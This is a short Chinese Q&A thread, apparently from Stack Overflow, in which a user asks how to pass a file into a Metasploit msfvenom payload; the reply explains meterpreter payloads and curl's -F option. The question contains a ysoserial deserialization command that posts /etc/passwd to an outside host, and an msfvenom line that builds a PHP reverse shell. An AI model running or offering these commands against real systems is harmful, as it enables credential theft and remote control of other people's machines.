【问题标题】:How to 'path a file' when generate Metasploit shell?生成 Metasploit shell 时如何“路径文件”?
【发布时间】:2016-06-29 10:10:48
【问题描述】:

我想用生成 Metasploit shell 来路径文件。是这样的:

java -jar ysoserial.jar CommonsCollections1 "curl -X POST -F file=@etc/passwd axample.com" | base64

例如-F file,我想在命令中路径一个文件:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

这只是我想要路径文件的命令。我的文件是一个有效负载文件(etc/payload)。我不知道执行此操作的命令。我试图找到一个教程,但找不到。

【问题讨论】:

  • 你所说的文件路径是什么意思?
  • 拖放以轻松输入路径名称
  • -F file=@etc/passwd 是'将文件从计算机'放入命令并创建shellcode。我想对 metasploit 做同样的事情。

标签: shell metasploit


【解决方案1】:

据我了解,您正在使用 msfvenom 工具生成 Meterpreter payload - 将在目标主机上运行的程序(在这种情况下,它将为您带来目标主机的命令 shell )。

此有效负载是 Metasploit 框架的一部分 - 一个预定义程序,而不是您的自定义脚本,您希望将文件传递给它。如果是这样,这一切都取决于 Meterpreter 的参数将任何东西传递给它。但似乎在 Meterpreter 中没有像 just path a some file 这样的选项。

curl 的示例中,-F 选项被 cURL 应用程序识别,代表 HTTP 表单发布并指示 Web 服务器上传文件,属性名称为 file

但是您想将什么文件路径传递给 Meterpreter 有效负载?你的最终目标是什么?现在它看起来毫无意义。

 
为您更新评论

curl 是一个不同的应用程序,它们使用 -F 选项格式实现。在msfvenom 中使用以下形式传递变量CUSTOM1

msfvenom -p &lt;payload&gt; LHOST=&lt;...&gt; LPORT=&lt;...&gt; CUSTOM1=&lt;...&gt; ...

【讨论】:

  • ax 中的 curl 和 -F 是否可以与 metesploit 一起使用?我的目标是类似于示例的命令,但使用 metasploit。
猜你喜欢
  • 1970-01-01
  • 1970-01-01
  • 2015-04-03
  • 1970-01-01
  • 2014-05-07
  • 2014-10-22
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
相关资源
最近更新 更多